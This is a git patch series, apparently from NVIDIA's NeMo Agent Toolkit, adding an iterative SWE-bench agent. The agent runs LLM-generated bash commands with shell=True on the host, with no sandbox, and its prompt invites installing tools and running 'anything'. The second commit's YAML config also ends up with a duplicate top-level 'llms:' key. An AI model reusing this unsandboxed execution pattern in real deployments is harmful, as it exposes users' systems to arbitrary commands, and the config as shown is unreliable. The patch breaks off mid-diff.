From 658a8f9e76e8bae9471a62e3be91d04458f34c34 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 14 Jan 2026 12:15:41 -0800 Subject: [PATCH 01/22] feat(swe-bench): implement iterative predictor for SWE-bench - Add IterativeAgent - Add config_iterative.yml - Add git tools - Add SweBenchPredictorIterativeConfig - Register iterative predictor and git tool - Update README.md Signed-off-by: Jerry Guan --- .../swe_bench/README.md | 1 + .../swe_bench/src/nat_swe_bench/config.py | 18 +- .../configs/config_iterative.yml | 71 +++ .../predictors/predict_iterative/__init__.py | 0 .../predict_iterative/predict_iterative.py | 504 ++++++++++++++++++ .../predict_iterative/tools/__init__.py | 0 .../predict_iterative/tools/git_tool.py | 85 +++ .../predict_iterative/tools/register.py | 60 +++ .../src/nat_swe_bench/predictors/register.py | 1 + .../src/nat_swe_bench/register_tools.py | 1 + 10 files changed, 735 insertions(+), 6 deletions(-) create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py diff --git a/examples/evaluation_and_profiling/swe_bench/README.md b/examples/evaluation_and_profiling/swe_bench/README.md index 155cbcddbb..8118518146 100644 --- a/examples/evaluation_and_profiling/swe_bench/README.md +++ b/examples/evaluation_and_profiling/swe_bench/README.md @@ -159,6 +159,7 @@ That information is only used for evaluation. Using it can taint the predictor a These predictors are provided in this NeMo Agent Toolkit example: - `gold` - Uses the patch from the `SWEBenchInput` instance, bypassing problem-solving logic. See [predict_gold_stub.py](src/nat_swe_bench/predictors/predict_gold/predict_gold_stub.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_gold.yml`. - `skeleton` - Skeleton code for creating a problem-solving workflow. This code can be copied to create a net-new predictor. See [predict_skeleton.py](src/nat_swe_bench/predictors/predict_skeleton/predict_skeleton.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_skeleton.yml`. +- `iterative` - Iterative agent that solves problems by executing bash commands step-by-step, observing results, and generating patches. See [predict_iterative.py](src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_iterative.yml`. ### Adding a net new predictor To add a new predictor: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py index d6f5b60a67..11b6c1219c 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py @@ -16,10 +16,13 @@ import typing from pydantic import Discriminator +from pydantic import Field from pydantic import Tag from nat.data_models.common import BaseModelRegistryTag from nat.data_models.common import TypedBaseModel +from nat.data_models.component_ref import FunctionRef +from nat.data_models.component_ref import LLMRef from nat.data_models.function import FunctionBaseConfig @@ -34,13 +37,16 @@ class SweBenchPredictorGoldConfig(SweBenchPredictorBaseConfig, name="gold"): class SweBenchPredictorSkeletonConfig(SweBenchPredictorBaseConfig, name="skeleton"): verbose: bool = False +class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterative"): + llm_name: LLMRef = Field(description="LLM to use for iterative agent") + step_limit: int = Field(default=250, description="Maximum number of agent steps") + timeout: int = Field(default=60, description="Command execution timeout in seconds") -SweBenchPredictorConfig = typing.Annotated[typing.Annotated[SweBenchPredictorGoldConfig, - Tag(SweBenchPredictorGoldConfig.static_type())] - | typing.Annotated[SweBenchPredictorSkeletonConfig, - Tag(SweBenchPredictorSkeletonConfig.static_type())], - Discriminator(TypedBaseModel.discriminator)] - +SweBenchPredictorConfig = typing.Annotated[ + typing.Annotated[SweBenchPredictorGoldConfig, Tag(SweBenchPredictorGoldConfig.static_type())] + | typing.Annotated[SweBenchPredictorSkeletonConfig, Tag(SweBenchPredictorSkeletonConfig.static_type())] + | typing.Annotated[SweBenchPredictorIterativeConfig, Tag(SweBenchPredictorIterativeConfig.static_type())], + Discriminator(TypedBaseModel.discriminator)] class SweBenchWorkflowConfig(FunctionBaseConfig, name="swe_bench"): predictor: SweBenchPredictorConfig diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml new file mode 100644 index 0000000000..21fa4f7ee0 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -0,0 +1,71 @@ +llms: + claude_sonnet_llm: + _type: litellm + model_name: anthropic/claude-sonnet-4-5-20250929 + temperature: 0.0 + api_key: "${ANTHROPIC_API_KEY}" # Set this environment variable before running + +# llms: +# openai_llm: +# _type: litellm +# model_name: openai/gpt-5.2 +# temperature: 0.0 +# api_key: "${OPENAI_API_KEY}" # Set this environment variable before running + + +# llms: +# nim_llm: +# _type: nim +# model_name: meta/llama-3.3-70b-instruct +# temperature: 0.6 +# max_tokens: 4096 + +workflow: + _type: swe_bench + predictor: + _type: iterative + llm_name: "claude_sonnet_llm" + step_limit: 250 + timeout: 60 + +functions: + git_repo_tool: + _type: git_repo_tool + workspace_dir: "./.workspace" + cleanup_on_exit: true + +eval: + general: + output_dir: .tmp/nat/examples/evaluation_and_profiling/swe_bench/iterative/ + max_concurrency: 1 + dataset: + _type: parquet + file_path: hf://datasets/princeton-nlp/SWE-bench_Lite/data/test-00000-of-00001.parquet + id_key: instance_id + structure: + disable: true + filter: + allowlist: + field: + instance_id: + - sympy__sympy-20590 + #- sympy__sympy-21055 + #- sympy__sympy-11400 + #- sympy__sympy-11870 + #- astropy__astropy-12907 + #- astropy__astropy-6938 + #- django__django-15781 + #- django__django-11001 + #- matplotlib__matplotlib-25332 + #- mwaskom__seaborn-3010 + #- pallets__flask-4045 + #- psf__requests-1963 + #- pydata__xarray-3364 + + evaluators: + swe_bench: + _type: swe_bench + run_id: nat_iterative_1 + clean: true + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py new file mode 100644 index 0000000000..19a980c4b1 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -0,0 +1,504 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Iterative agent-based predictor for SWE-bench problems. + +This predictor implements a step-by-step approach where the agent: +1. Receives a problem statement +2. Executes bash commands iteratively +3. Observes results and adjusts strategy +4. Generates patch using git diff + +The iterative loop and prompts are inspired by mini-swe-agent, adapted for the NAT framework. +""" + +import asyncio +import json +import logging +import re +import subprocess +from dataclasses import dataclass +from pathlib import Path + +from langchain_core.messages import AIMessage, HumanMessage, SystemMessage +from rich.console import Console + +from nat.builder.builder import Builder +from nat.builder.framework_enum import LLMFrameworkEnum +from nat.data_models.swe_bench_model import SWEBenchInput + +from nat_swe_bench.config import SweBenchWorkflowConfig +from nat_swe_bench.predictors.predict_abc import SweBenchPredictorBase +from nat_swe_bench.predictors.predictor_registry import register_predictor + +logger = logging.getLogger(__name__) + +console = Console(highlight=False) + + +class NonTerminatingException(Exception): + """Raised for conditions that can be handled by the agent.""" + + +class TerminatingException(Exception): + """Raised for conditions that terminate the agent.""" + + +class FormatError(NonTerminatingException): + """Raised when the LLM's output is not in the expected format.""" + + +class ExecutionTimeoutError(NonTerminatingException): + """Raised when the action execution timed out.""" + + +class Submitted(TerminatingException): + """Raised when the agent has finished its task.""" + + +class LimitsExceeded(TerminatingException): + """Raised when the agent has reached its step limit.""" + + +@dataclass +class IterativeAgentConfig: + """Configuration for the iterative agent.""" + step_limit: int = 250 + timeout: int = 60 + max_output_length: int = 10000 + + +class IterativeAgent: + """Iterative agent that executes commands step-by-step.""" + + # Timeout message template + _TIMEOUT_TEMPLATE = ( + "The last command {action} timed out and has been killed.\n" + "The output of the command was:\n \n{output}\n\n" + "Please try another command and make sure to avoid those requiring interactive input." + ) + + # Output truncation warning message + _OUTPUT_TRUNCATION_WARNING = ( + "\n\n" + "The output of your last command was too long.\n" + "Please try a different command that produces less output.\n" + "If you're looking at a file you can try use head, tail or sed to view a smaller number of lines selectively.\n" + "If you're using grep or find and it produced too much output, you can use a more selective search pattern.\n" + "If you really need to see something from the full command's output, you can redirect output to a file and then search in that file.\n" + "\n\n" + ) + + def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig): + self.llm = llm + self.repo_path = repo_path + self.config = config + self.messages: list = [] + self.n_steps = 0 + + def add_message(self, role: str, content: str): + """Add a message to the conversation and print it for debugging.""" + if role == "system": + msg = SystemMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold blue]System[/bold blue] (step {self.n_steps}):\n", end="", highlight=False) + elif role == "user" or role == "human": + msg = HumanMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold green]User[/bold green] (step {self.n_steps}):\n", end="", highlight=False) + elif role == "assistant" or role == "ai": + msg = AIMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold red]Assistant[/bold red] (step {self.n_steps}):\n", end="", highlight=False) + else: + raise ValueError(f"Unknown role: {role}") + + # Print content + console.print(content, highlight=False, markup=False) + + def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: + """Build system and instance prompts customized for SWE-bench. + + Args: + task: The task description/PR description + repo_path: Path to the repository being worked on + """ + # Convert Path to string for template usage + repo_path_str = str(repo_path) + + system_template = """You are a helpful assistant that can interact multiple times with a computer shell to solve programming tasks. +Your response must contain exactly ONE bash code block with ONE command (or commands connected with && or ||). + +Include a THOUGHT section before your command where you explain your reasoning process. +Format your response as shown in . + + +THOUGHT: Your reasoning and analysis here + +```bash +your_command_here +``` + + +Failure to follow these rules will cause your response to be rejected.""" + + instance_template = f""" +Consider the following PR description: +{task} + + + +# Task Instructions + +## Overview +You're a software engineer interacting continuously with a computer by submitting commands. +You'll be helping implement necessary changes to meet requirements in the PR description. +Your task is specifically to make changes to non-test files in the current directory in order to fix the issue described in the PR description in a way that is general and consistent with the codebase. + +IMPORTANT: This is an interactive process where you will think and issue ONE command, see its result, then think and issue your next command. + +For each response: +1. Include a THOUGHT section explaining your reasoning and what you're trying to accomplish +2. Provide exactly ONE bash command to execute + +## Important Boundaries +- MODIFY: Regular source code files in {repo_path_str} (this is the working directory for all your subsequent commands) +- DO NOT MODIFY: Tests, configuration files (pyproject.toml, setup.cfg, etc.) + +## Recommended Workflow +1. Analyze the codebase by finding and reading relevant files +2. Create a script to reproduce the issue +3. Edit the source code to resolve the issue +4. Verify your fix works by running your script again +5. Test edge cases to ensure your fix is robust +6. Clean up any temporary files you created (test scripts, plans, summaries, etc.) + +## Command Execution Rules +You are operating in an environment where +1. You write a single command +2. The system executes that command in a subshell +3. You see the result +4. You write your next command + +Each response should include: +1. A **THOUGHT** section where you explain your reasoning and plan +2. A single bash code block with your command + +Format your responses like this: + + +THOUGHT: Here I explain my reasoning process, analysis of the current situation, +and what I'm trying to accomplish with the command below. + +```bash +your_command_here +``` + + +Commands must be specified in a single bash code block: + +```bash +your_command_here +``` + +**CRITICAL REQUIREMENTS:** +- Your response SHOULD include a THOUGHT section explaining your reasoning +- Your response MUST include EXACTLY ONE bash code block +- This bash block MUST contain EXACTLY ONE command (or a set of commands connected with && or ||) +- If you include zero or multiple bash blocks, or no command at all, YOUR RESPONSE WILL FAIL +- Do NOT try to run multiple independent commands in separate blocks in one response +- Directory or environment variable changes are not persistent. Every action is executed in a new subshell. +- However, you can prefix any action with `MY_ENV_VAR=MY_VALUE cd /path/to/working/dir && ...` or write/load environment variables from files + +Example of a CORRECT response: + +THOUGHT: I need to understand the structure of the repository first. Let me check what files are in the current directory to get a better understanding of the codebase. + +```bash +ls -la +``` + + +Example of an INCORRECT response: + +THOUGHT: I need to examine the codebase and then look at a specific file. I'll run multiple commands to do this. + +```bash +ls -la +``` + +Now I'll read the file: + +```bash +cat file.txt +``` + + +If you need to run multiple commands, either: +1. Combine them in one block using && or || +```bash +command1 && command2 || echo "Error occurred" +``` + +2. Wait for the first command to complete, see its output, then issue the next command in your following response. + +## Environment Details +- You have a full Linux shell environment +- Always use non-interactive flags (-y, -f) for commands +- Avoid interactive tools like vi, nano, or any that require user input +- If a command isn't available, you can install it + +## Useful Command Examples + +### Create a new file: +```bash +cat <<'EOF' > newfile.py +import numpy as np +hello = "world" +print(hello) +EOF +``` + +### Edit files with sed: +```bash +# Replace all occurrences +sed -i 's/old_string/new_string/g' filename.py + +# Replace only first occurrence +sed -i 's/old_string/new_string/' filename.py + +# Replace first occurrence on line 1 +sed -i '1s/old_string/new_string/' filename.py + +# Replace all occurrences in lines 1-10 +sed -i '1,10s/old_string/new_string/g' filename.py +``` + +### View file content: +```bash +# View specific lines with numbers +nl -ba filename.py | sed -n '10,20p' +``` + +### Any other command you want to run +```bash +anything +``` + +## Submission +When you've completed your work (reading, editing, testing), and cannot make further progress +issue exactly the following command: + +```bash +echo COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached +``` + +This command will submit your work. +You cannot continue working (reading, editing, testing) in any way on this task after submitting. +""" + + return system_template, instance_template + + async def run(self, task: str) -> tuple[str, str]: + """Run the iterative agent loop until completion.""" + system_template, instance_template = self._build_prompts(task, self.repo_path) + + self.messages = [] + self.add_message("system", system_template) + self.add_message("user", instance_template) + + while True: + try: + # Check limits + if 0 < self.config.step_limit <= self.n_steps: + raise LimitsExceeded(f"Reached step limit: {self.config.step_limit}") + + self.n_steps += 1 + + response = await self._query_llm() + observation = await self._execute_action(response) + + # Check if completed + if "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT" in observation: + # Extract patch from git diff output + patch_lines = observation.split("\n", 1) + if len(patch_lines) > 1: + patch = patch_lines[1] + raise Submitted(patch) + raise Submitted(observation) + + self.add_message("user", f"Observation:\n{observation}") + + except NonTerminatingException as e: + # Recoverable errors: add error message and continue + self.add_message("user", str(e)) + except TerminatingException as e: + # Terminal errors: add error message and return + self.add_message("user", str(e)) + return type(e).__name__, str(e) + + async def _query_llm(self) -> str: + """Query LLM and return response content.""" + try: + response = await self.llm.ainvoke(self.messages) + content = response.content if hasattr(response, 'content') else str(response) + self.add_message("assistant", content) + return content + except Exception as e: + logger.error("LLM invocation failed: %s", e, exc_info=True) + # recoverable error, let the agent continue + raise NonTerminatingException(f"LLM call failed: {str(e)}") + + async def _execute_action(self, response: str) -> str: + """Parse action from response and execute it asynchronously.""" + # Extract bash command from response + action_regex = r"```bash\s*\n(.*?)\n```" + matches = re.findall(action_regex, response, re.DOTALL) + if len(matches) != 1: + error_msg = f"Expected exactly one bash command, found {len(matches)}" + raise FormatError(error_msg) + + command = matches[0].strip() + + # Execute command using asyncio.to_thread to avoid blocking + def run_cmd(): + """Synchronous command execution function.""" + return subprocess.run( + command, + shell=True, + cwd=str(self.repo_path), + timeout=self.config.timeout, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, # stderr redirected to stdout + text=True, + encoding="utf-8", + errors="replace" + ) + + try: + result = await asyncio.to_thread(run_cmd) + + # stderr is automatically redirected to stdout via stderr=subprocess.STDOUT + output = result.stdout if result.stdout else "" + + # Include returncode in the output so agent know action success or fail + output = f"{result.returncode}\n{output}" + + # Truncate long outputs + max_length = self.config.max_output_length + if len(output) > max_length: + elided_chars = len(output) - max_length + head_tail_length = max_length // 2 + output = ( + f"{output[:head_tail_length]}\n" + f"\n{elided_chars} characters elided\n\n" + f"{output[-head_tail_length:]}" + ) + output = self._OUTPUT_TRUNCATION_WARNING + output + + return output + + except (TimeoutError, subprocess.TimeoutExpired) as e: + # Extract output from exception if available (only subprocess.TimeoutExpired has output attribute) + if isinstance(e, subprocess.TimeoutExpired) and hasattr(e, "output") and e.output: + output = e.output.decode("utf-8", errors="replace") + else: + output = "" + # Format timeout message using template + timeout_message = self._TIMEOUT_TEMPLATE.format( + action=command, + output=output + ) + raise ExecutionTimeoutError(timeout_message) + except Exception as e: + raise NonTerminatingException(f"Error executing command: {str(e)}") + + +@register_predictor("iterative") +class SweBenchPredictor(SweBenchPredictorBase): + """Iterative agent-based predictor for SWE-bench.""" + + def __init__(self, config: SweBenchWorkflowConfig, builder: Builder): + super().__init__(config, builder) + self.git_tool = None + + async def predict_fn(self, swebench_input: SWEBenchInput) -> str: + """Generate patch using iterative agent approach.""" + logger.info("Processing instance %s with iterative agent", swebench_input.instance_id) + + # Setup repository + if self.git_tool is None: + self.git_tool = await self.builder.get_tool( + "git_repo_tool", + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + repo_name = swebench_input.instance_id.split('-')[0] + org, repo = repo_name.split('__') + repo_url = f"https://github.com/{org}/{repo}" + + # Setup repo + try: + repo_path_str = await self.git_tool.arun(json.dumps({ + "operation": "setup", + "repo_url": repo_url, + "base_commit": swebench_input.base_commit + })) + repo_path = Path(repo_path_str) + logger.info("Repository setup at %s", repo_path) + except Exception as e: + logger.exception("Failed to setup repository: %s", e) + return f"Error: Failed to setup repository - {str(e)}" + + try: + # Get LLM + llm = await self.builder.get_llm( + self.config.predictor.llm_name, + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + # Build task description + task = self._build_task_description(swebench_input) + + # Create agent config + agent_config = IterativeAgentConfig( + step_limit=getattr(self.config.predictor, 'step_limit', 250), + timeout=getattr(self.config.predictor, 'timeout', 60) + ) + + # Run iterative agent + agent = IterativeAgent(llm, repo_path, agent_config) + exit_status, patch = await agent.run(task) + + if exit_status == "Submitted": + logger.info("Agent completed successfully with patch") + return patch + else: + logger.warning(f"Agent exited with status: {exit_status}, result: {patch[:200] if patch else 'None'}") + return f"Error: {exit_status} - {patch}" + + except Exception as e: + logger.exception(f"Error processing {swebench_input.instance_id}: {e}") + return f"Error: {str(e)}" + + def _build_task_description(self, swebench_input: SWEBenchInput) -> str: + """Build task description from SWE-bench input.""" + parts = [swebench_input.problem_statement] + if swebench_input.hints_text: + parts.append(f"\nAdditional Context:\n{swebench_input.hints_text}") + return "\n".join(parts) + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py new file mode 100644 index 0000000000..62ed3db61f --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -0,0 +1,85 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import logging +from dataclasses import dataclass +from pathlib import Path + +from git import Repo + +logger = logging.getLogger(__name__) + + +@dataclass +class RepoContext: + """Context manager for repository operations.""" + repo_url: str + base_path: Path + repo: Repo | None = None + + def __post_init__(self): + self.repo_name = self.repo_url.split('/')[-1].replace('.git', '') + self.repo_path = self.base_path / self.repo_name + + +class RepoManager: + + def __init__(self, workspace_dir: str): + self.workspace = Path(workspace_dir) + self.workspace.mkdir(parents=True, exist_ok=True) + self.active_repos = {} + + async def setup_repository(self, repo_url: str, base_commit: str) -> RepoContext: + """Setup a repository at a specific commit.""" + repo_path = get_repo_path(str(self.workspace), repo_url) + + if str(repo_path) in self.active_repos: + context = self.active_repos[str(repo_path)] + await checkout_commit(context.repo, base_commit) + return context + + repo = await clone_repository(repo_url, repo_path) + await checkout_commit(repo, base_commit) + + context = RepoContext(repo_url=repo_url, base_path=self.workspace, repo=repo) + self.active_repos[str(repo_path)] = context + return context + + async def cleanup(self): + """Clean up all managed repositories.""" + import shutil + for repo_path_str in list(self.active_repos.keys()): + repo_path = Path(repo_path_str) + if repo_path.exists(): + shutil.rmtree(repo_path) + self.active_repos.clear() + + +def get_repo_path(workspace_dir: str, repo_url: str) -> Path: + """Generate a unique path for the repository.""" + repo_name = repo_url.split('/')[-1].replace('.git', '') + return Path(workspace_dir) / repo_name + + +async def clone_repository(repo_url: str, target_path: Path) -> Repo: + """Clone a repository to the specified path.""" + logger.info("Cloning repository %s to %s", repo_url, target_path) + return Repo.clone_from(repo_url, target_path) + + +async def checkout_commit(repo: Repo, commit_hash: str): + """Checkout a specific commit in the repository.""" + logger.info("Checking out commit %s", commit_hash) + repo.git.checkout(commit_hash) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py new file mode 100644 index 0000000000..f4b5220264 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -0,0 +1,60 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# Register all the tools needed by the full predictor without loading the dependencies. +import typing + +from nat.builder.builder import Builder +from nat.builder.function_info import FunctionInfo +from nat.cli.register_workflow import register_function +from nat.data_models.function import FunctionBaseConfig + + +class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): + """Configuration for git repository management tool.""" + _type: typing.Literal["git_repo_tool"] = "git_repo_tool" + workspace_dir: str = "./.workspace" # Base directory for cloning repositories + cleanup_on_exit: bool = True # Whether to clean up repos after use + + +@register_function(config_type=GitRepoToolConfig) +async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): + """Git repository management tool for SWE Bench.""" + import json + + from .git_tool import RepoManager + repo_manager = RepoManager(tool_config.workspace_dir) + + # Simple async function that accepts a JSON string + async def git_operations(args_str: str) -> str: + args = json.loads(args_str) + operation = args.get('operation') + + if operation == "setup": + context = await repo_manager.setup_repository(args['repo_url'], args['base_commit']) + return str(context.repo_path) + + if operation == "cleanup": + await repo_manager.cleanup() + return "Cleanup complete" + + raise ValueError(f"Unknown operation: {operation}") + + try: + yield FunctionInfo.from_fn(git_operations, + description="Git repository management tool that accepts JSON string arguments") + finally: + if tool_config.cleanup_on_exit: + await repo_manager.cleanup() diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py index 61e8f1a469..afa1861eea 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py @@ -17,3 +17,4 @@ # Import the predictor classes to register them from nat_swe_bench.predictors.predict_gold.predict_gold_stub import SweBenchPredictor as GoldPredictor +from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor as IterativePredictor diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py index ef10ebc8aa..7ef908ebf8 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py @@ -16,3 +16,4 @@ # flake8: noqa: F401, pylint: disable=unused-import # imports tools to register them +from nat_swe_bench.predictors.predict_iterative.tools.register import git_repo_tool From 2395ac49999eb51741835495ce16ccf2bed50876 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 14 Jan 2026 22:07:12 -0800 Subject: [PATCH 02/22] fix CI warnings when PR Signed-off-by: Jerry Guan --- .../swe_bench/src/nat_swe_bench/config.py | 24 ++++++++- .../configs/config_iterative.yml | 51 +++++++++++-------- .../predict_iterative/tools/git_tool.py | 17 +++++-- .../predict_iterative/tools/register.py | 12 +++-- 4 files changed, 75 insertions(+), 29 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py index 11b6c1219c..7352d9ade7 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py @@ -21,23 +21,40 @@ from nat.data_models.common import BaseModelRegistryTag from nat.data_models.common import TypedBaseModel -from nat.data_models.component_ref import FunctionRef from nat.data_models.component_ref import LLMRef from nat.data_models.function import FunctionBaseConfig class SweBenchPredictorBaseConfig(TypedBaseModel, BaseModelRegistryTag): + """Base configuration class for SWE-bench predictors.""" description: str = "Swe Bench Problem Solver" class SweBenchPredictorGoldConfig(SweBenchPredictorBaseConfig, name="gold"): + """Configuration for the gold predictor that uses the provided patch directly. + + Attributes: + verbose: Whether to enable verbose output for debugging. + """ verbose: bool = True class SweBenchPredictorSkeletonConfig(SweBenchPredictorBaseConfig, name="skeleton"): + """Configuration for the skeleton predictor template. + + Attributes: + verbose: Whether to enable verbose output for debugging. + """ verbose: bool = False class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterative"): + """Configuration for the iterative predictor that solves problems step-by-step. + + Attributes: + llm_name: Reference to the LLM to use for iterative problem solving. + step_limit: Maximum number of agent steps before termination. + timeout: Command execution timeout in seconds. + """ llm_name: LLMRef = Field(description="LLM to use for iterative agent") step_limit: int = Field(default=250, description="Maximum number of agent steps") timeout: int = Field(default=60, description="Command execution timeout in seconds") @@ -49,4 +66,9 @@ class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterat Discriminator(TypedBaseModel.discriminator)] class SweBenchWorkflowConfig(FunctionBaseConfig, name="swe_bench"): + """Configuration for the SWE-bench workflow. + + Attributes: + predictor: The predictor configuration (gold, skeleton, or iterative). + """ predictor: SweBenchPredictorConfig diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml index 21fa4f7ee0..91fd997fb7 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -1,3 +1,25 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +llms: + nim_llm: + _type: nim + model_name: mistralai/mistral-nemotron + temperature: 0.6 + max_tokens: 4096 + llms: claude_sonnet_llm: _type: litellm @@ -12,14 +34,6 @@ llms: # temperature: 0.0 # api_key: "${OPENAI_API_KEY}" # Set this environment variable before running - -# llms: -# nim_llm: -# _type: nim -# model_name: meta/llama-3.3-70b-instruct -# temperature: 0.6 -# max_tokens: 4096 - workflow: _type: swe_bench predictor: @@ -49,18 +63,15 @@ eval: field: instance_id: - sympy__sympy-20590 - #- sympy__sympy-21055 - #- sympy__sympy-11400 - #- sympy__sympy-11870 - #- astropy__astropy-12907 - #- astropy__astropy-6938 - #- django__django-15781 - #- django__django-11001 - #- matplotlib__matplotlib-25332 - #- mwaskom__seaborn-3010 - #- 